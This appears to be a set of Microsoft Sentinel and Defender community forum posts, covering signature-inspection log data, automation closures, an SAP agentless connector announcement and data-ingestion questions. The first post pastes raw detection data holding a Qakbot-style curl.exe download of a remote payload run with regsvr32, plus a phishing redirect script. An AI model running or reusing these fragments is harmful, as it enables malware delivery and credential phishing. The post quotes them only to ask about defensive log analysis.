I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://

Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.

Observed Automation Discrepancies
Hi Team, I want to understand the logic behind the Defender XDR Automation Engine. How does it work?

I have observed Defender XDR Automation Engine behavior contrary to expectations: despite identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent. A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. The automation was not triggered by our own rules, but by Microsoft's Defender XDR, and we are seeking clarification on the underlying logic.

Microsoft Sentinel for SAP Agentless connector GA
Dear Community,

Today is the day: Our new agentless connector for the Microsoft Sentinel Solution for SAP applications is Generally Available now! Fully onboarded to SAP’s official Business Accelerator Hub and ready for prime time wherever your SAP systems are waiting – on-premises, hyperscalers, RISE, or GROW – to be protected.

Let’s hear from an agentless customer:

“With the Microsoft Sentinel Solution for SAP and its new agentless connector, we accelerated deployment across our SAP landscape without the complexity of containerized agents. This streamlined approach elevated our SOC’s visibility into SAP security events, strengthened our compliance posture, and enabled faster, more informed incident response” – SOC Specialist, North American aviation company

Use the video below to kick off your own agentless deployment today. #Kudos to the amazing mvigilante for showing us around the new connector!

But we didn’t stop there! Security is being reengineered for the AI era - moving from static, rule-based controls to platform-driven, machine-speed defence that anticipates threats before they strike. Attackers think in graphs - Microsoft does too. We’re bringing relationship-aware context to Microsoft Security - so defenders and AI can see connections, understand the impact of a potential compromise (blast radius), and act faster across pre-breach and post-breach scenarios, including for SAP systems - your crown jewels. See it in action in the scenario below, where a phishing compromise led to an SAP login bypassing MFA, with follow-on operating-system activities on the SAP host downloading trojan software. Enjoy this clickable experience for more details on the scenario.

(Screenshot: Shows how a phishing compromise escalated to an SAP MFA bypass, highlighting cross-domain correlation.)

The Sentinel Solution for SAP has AI-first in mind and directly integrates with our security platform on the Defender portal for enterprise-wide signal correlation, Security Copilot reasoning, and Sentinel Data Lake usage.
Your real-time SAP detections operate on the Analytics tier for instant results and threat hunting, while the same SAP logs get mirrored to the lake for cost-efficient long-term storage (up to 12 years). Access that data for compliance reporting or historic analysis through KQL jobs on the lake. No more ticking the audit-report check box with a "yeah, I have the data stored somewhere" – you can actually query and use your SAP telemetry in long-term storage at scale. Learn more here.

Findings from the Agentless Connector preview

During our preview we learned that the majority of customers immediately profit from the far smoother onboarding experience compared to the Docker-based approach. Deployment efforts and time to first SAP log arrival in Sentinel went from days and weeks to hours.

⚠️ Deprecation notice for containerized data connector agent ⚠️

The containerized SAP data connector will be deprecated on September 14th, 2026. This change aligns with the discontinuation of the SAP RFC SDK, SAP's strategic integration roadmap, and customer demand for simpler integration. Migrate to the new agentless connector for simplified onboarding and compliance with SAP’s roadmap. All new deployments starting October 31, 2025, will only have the new agentless connector option, and existing customers should plan their migration using the guidance on Microsoft Learn. It will be billed at the same price as the containerized agent, ensuring no cost impact for customers.

Note📌: To support the transition for those of you on the Docker-based data connector, we have enhanced our built-in KQL functions for SAP to work across data sources for hybrid and parallel execution.

Spotlight on new Features

Inspired by the feedback of early adopters, we are shipping two of the most requested new capabilities with GA right away.

Customizable polling frequency: Balance threat detection value (1-minute intervals give the best value) with utilization of SAP Integration Suite resources based on your needs.

⚠️ Warning!
Increasing the intervals may result in message processing truncation to avoid SAP CPI saturation. See this blog for more insights. Refer to the max-rows parameter and SAP documentation to make informed decisions.

Customizable API endpoint path suffix: Flexible endpoints allow running all your SAP security integration flows from the agentless connector and adherence to your naming strategies. Furthermore, you can add community extensions like SAP S/4HANA Cloud public edition (GROW), the SAP Table Reader, and more.

(Screenshot: Displays the simplified onboarding flow for the agentless SAP connector.)

You want more? Here is your chance to share additional feature requests to influence our backlog. We would like to hear from you!

Getting Started with Agentless

The new agentless connector automatically appears in your environment – make sure to upgrade to the latest version 3.4.05 or higher.

(Screenshot: Sentinel Content Hub view highlighting the agentless SAP connector tile in the Microsoft Defender portal, ready for one-click deployment and integration with your security platform.)

The deployment experience on Sentinel is fully automatic with a single button click: It creates the Azure Data Collection Endpoint (DCE), Data Collection Rule (DCR), and a Microsoft Entra ID app registration assigned the RBAC role "Monitoring Metrics Publisher" on the DCR to allow SAP log ingest.

Explore partner add-ons that build on top of agentless

The ISV partner ecosystem for the Microsoft Sentinel Solution for SAP is growing to tailor the agentless offering even further. The current cohort has flagship providers like our co-engineering partner SAP SE themselves with their security products SAP LogServ & SAP Enterprise Threat Detection (ETD), and our mutual partners Onapsis and SecurityBridge.

Ready to go agentless?

➤ Get started from here
➤ Explore partner add-ons here.
➤ Share feature requests here.
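For the lake-tier retention scenario described earlier, a KQL job over the mirrored SAP logs could drive a yearly compliance report. This is a minimal sketch: the table name (ABAPAuditLog) and columns (User, SystemID, MessageID) are assumptions, so check your workspace schema, and verify the SAP Security Audit Log message IDs for your release:

```kusto
// Sketch of a data lake KQL job for long-term SAP compliance reporting.
// Table and column names are assumptions - validate against your schema.
ABAPAuditLog
| where TimeGenerated > ago(365d)
| where MessageID == "AU2"                 // SAP audit message ID for failed logon (verify)
| summarize FailedLogons = count() by User, SystemID, bin(TimeGenerated, 1d)
| where FailedLogons > 10                  // arbitrary threshold for the report
| order by FailedLogons desc
```

Running this as a scheduled lake job rather than an Analytics-tier query keeps the historic lookback on the cheaper storage tier while still producing auditable output.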
Next Steps

Once deployed, I recommend checking AryaG’s insightful blog series for details on how to move to production with the built-in SAP content of agentless. Looking to expand protection to SAP Business Technology Platform? Here you go.

#Kudos to the amazing Sentinel for SAP team and our incredible community contributors!

That's a wrap 🎬. Remember: bringing SAP under the protection of your central SIEM isn't just a checkbox - it's essential for comprehensive security and compliance across your entire IT estate.

Cheers,
Martin

Ingesting Windows Security Events into Custom Datalake Tables Without Using Microsoft‑Prefixed Table
Hi everyone,

I’m looking to see whether there is a supported method to ingest Windows Security Events into custom Microsoft Sentinel Data Lake–tiered tables (for example, SecurityEvents_CL) without writing to or modifying the Microsoft‑prefixed analytical tables. Essentially, I want to route these events directly into custom tables only, bypassing the default Microsoft‑managed tables entirely. Has anyone implemented this, or is there a recommended approach?

Thanks in advance for any guidance.

Best Regards,
Prabhu Kiran

Migrate MS Sentinel from one tenant to another tenant
I need to migrate Microsoft Sentinel with all its resources (playbooks, workbooks, connectors, analytics rules) to another tenant. I need step-by-step guidance, since the Microsoft documentation I've reviewed doesn't seem to cover this. I would like to know if there is any tool or functionality that allows me to do this without having to rebuild everything.